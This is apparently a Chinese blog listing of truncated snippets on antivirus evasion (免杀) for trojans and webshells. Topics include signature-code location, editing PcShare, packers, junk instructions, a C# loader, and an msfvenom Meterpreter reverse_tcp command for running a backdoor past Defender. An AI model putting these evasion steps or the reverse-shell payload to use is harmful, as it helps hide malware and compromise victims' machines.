1.基础的汇编语言 2.修改工具(不指那些傻瓜式软件)。如: OllyDbg . PEditor. C32ASM . MYCCL复合特征码定位器。UE .OC. 资源编辑器等。还有一些查壳 脱壳软件(如:PEID RL脱壳机等) . 以下是常用的几种免杀方法及工具:一、要使一个木马免杀 首先要准备一个不加壳的木马,这点非常重要,否则 免杀操作就不能进行下去。 然后我们要木马的内存免杀,从上面
转载
精选
2014-04-24 11:45:29
1257阅读
一.机械码,又称机器码 Ultraedit打开,编辑exe文件时你会看到许许多多的由0、1、2、3、4、5、6、7、8、9、A、B、C、D、E、F组成的数码,这些数码就是机器码。修改程序时必须通过修改机器码来修改exe文件。 二.需要熟练掌握的全部汇编知识 不大容易理解,可先强行背住,混个脸儿熟,以后慢慢的就理解了。 cmp a,b 比较a与b。 mov a,b 把b的值送给a。 re...
转载
2008-07-09 23:36:00
101阅读
2评论
PcShare可算国内最优秀的远程控制软件之一,其特有的驱动级隐藏技术让PS的隐蔽性有了质的提升。可再好的隐藏也必须先过安装这一关,由于杀软的特征码库中早已有PS的代码,所以在开监测的情况下,当服务端释放*.D1L和*.SYS两个文件时杀软会报警,因此没法儿安装。这时应该做什么?当然是免杀。加壳是没用的,要改特征码。改文件和内存特征码在前几期的黑防都已介绍过,照旧修改就可以。关键PS中有个
转载
精选
2008-04-21 13:40:23
2382阅读
转自 : MaskDiy博客
1.壳的分类:压缩壳和加密壳
2.壳的作用:保护和文件免杀
二.加壳免杀的几个弱点
1.不能躲过像瑞星这类具有内存查杀功能的杀毒软件。
2.一般不能躲过卡巴的查杀
因为卡巴采用了一种叫虚拟机技术。首先把加了多层壳的木马程序在虚拟机环境下运行一下,这样木马程序就会现出本来面目,这样无论你加了多少层壳,在运行后程序还是要暴露自已的。所以大家在加壳测试过程中也
转载
2011-09-14 17:35:30
4458阅读
一.机械码,又称机器码.ultraedit打开,编辑exe文件时你会看到许许多多的由0,1,2,3,4,5,6,7,8,9,A,B,C,D,E,F组成的数码,这些数码就是机器码.修改程序时必须通过修改机器码来修改exe文件.
二.需要熟练掌握的全部汇编知识(只有这么多)不大容易理解,可先强行背住,混个脸儿熟,以后慢慢的就理解了cmp a,b 比较a与bmov a,b 把b的值送给aret 返回主程
原创
2009-12-02 12:24:50
1225阅读
经测试,这种方式无法攻击windows10,因为它有defender,我们一旦运行起来,defender就会/x/meterpreter/reverse_tcp LPORT=13338 LHOST=192....
原创
2022-02-28 11:07:56
351阅读
经测试,这种方式无法攻击windows10,因为它有defender,我们一旦运行起来,defender就会把它干死不过,在电脑上装了360安全卫士的情况下,defender会被抑制,我们的后门就可以正常运行了先使用msfvenom生成shellcodemsfvenom -p windows/x64/meterpreter/reverse_tcp LPORT=13338 LHOST=192....
原创
2021-06-29 11:08:00
1088阅读
干货|免杀-C加载器免杀尝试哆啦安全|知识星球上线啦(优惠券活动即将到期)!!!微信公众号
原创
2021-12-14 09:21:43
933阅读
通过代码直接调用System.Management,替代powershell.exe c#代码,保存为1.cs: using System.Collections.ObjectModel; using System.Management.Automation; using System.Manage ...
转载
2021-07-17 23:39:00
1712阅读
2评论
(一)、免杀应注意的事项: 1.免杀的测试(在线杀毒、杀毒软件上报、世界反毒网:http://www.virustotal.com/zh-cn/) 在这里我建议大家不要上传自己的马到这样的网站上去.一上传不要多久就会被杀了.大家还是把杀软装在自己的电脑,然后测试比较好. 2.一个好的免杀木马要过文件、内存、行为、主动防御等一些专杀软件. 3.目前一些常用的杀软有
原创
2009-07-25 22:12:58
2366阅读
2评论
一.关于免杀的来源 为了让我们的木马在各种杀毒软件的威胁下活的更久. 二.什么叫免杀和查杀 可分为二类: 1.文件免杀和查杀:不运行程序用杀毒软件进行对该程序的扫描,所得结果。 2.内存的免杀和查杀:判断的方法1运行后,用杀毒软件的内存查杀功能. 2用OD载入,
一.关于免杀的来源
为了让我们的木马在各种杀毒软件的威胁下活的更久.
二.什么叫免杀和查杀
可分为二类:
1.文件免杀和查杀:
转载
2010-02-13 02:48:28
731阅读
webshell免杀php 免杀jsp 免杀https://xz.aliyun.com/t/10937https://xz.aliyun.com/t/10989php 免杀传统php免杀变形
原创
2022-04-29 21:48:25
107阅读
特征码引擎如今依旧十分常见,家家户户都在用。 打开360杀毒,以下显示的4个引擎中,”系统修复引擎、小红伞引擎”都是使用特征码进行病毒查杀的,其余的也实用特征码进行辅助。可见。如今的杀软中。特征码查杀的方法依旧占有不小的位置。 可是,特征码引擎有很大的缺陷——easy被逃避。由于一般它仅仅要见着特征
转载
2017-07-23 21:38:00
384阅读
源码免杀C++基础
都一样 正常安装就行
有的是这个版本
这三个解压到 覆盖
因为之前安装过了 就看下路径吧
最后 提一下Assist 安装需要 进入那个vc98 目录去 安装破解
如果缺dll 那就下一个加载就ok
原创
2021-08-16 09:43:41
997阅读
一: 灰鸽子免杀方法大全 在所有的版本中,黑防的鸽子算是比较好做免杀的了,今天在这里,我就用他做案例 一,最经典的OD一半一半定位法 我们把整个黑色标记的区域看成是没有修改的木马代码把它从中间切平均分成两半,把其中的一半用nop 填充掉,再用瑞星杀内存,如果杀掉了就说明特征代码在我们没有nop 掉的一半,没有杀到就说明我们刚刚nop的一半中含有特征代码。 所演示的情况是特征代码在没有no
转载
精选
2009-07-15 21:36:01
7837阅读
今天送上经典花指令
注:编写花指令,可参考以下成双指令,可任意自由组合.达到免杀效果. push ebp pop ebp push eax pop eax push esp pop esp push 0 push 0 push 10 -------其中数字可以任意,注意与下面对应 push -10 nop -----------可任意在中间添加 与它等效的: mov EDI,EDIadd esp
原创
2010-09-30 13:23:52
2260阅读
假设我们的特征码定位在MessageBoxA函数的地址(只是举个例子,一般这个函数不会被杀,其他函数也类似方法)那么我们到源码里面发现,我们在PrintMsg函数中调用了这个API函数,那么我们就要对他进行处理。对于输入表被查杀我们一般的处理方法是修改函数的调用方式,比如采用dll动态调用,通过上图,我们知道我们是以非unicode方式编译的MessageBox,他对应的非Unicode的函数为MessageBoxA,同时我们也得到这个MessageBoxA函数在UER32.dll文件中。那么我们修改MessageBox的调用方式为dll的动态调用,其代码修改成:typedef int (WI
转载
2012-10-31 09:03:00
365阅读
2评论
PHP小马免杀<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML><HEAD> <META http-equ
原创
2008-12-15 00:00:00
1347阅读
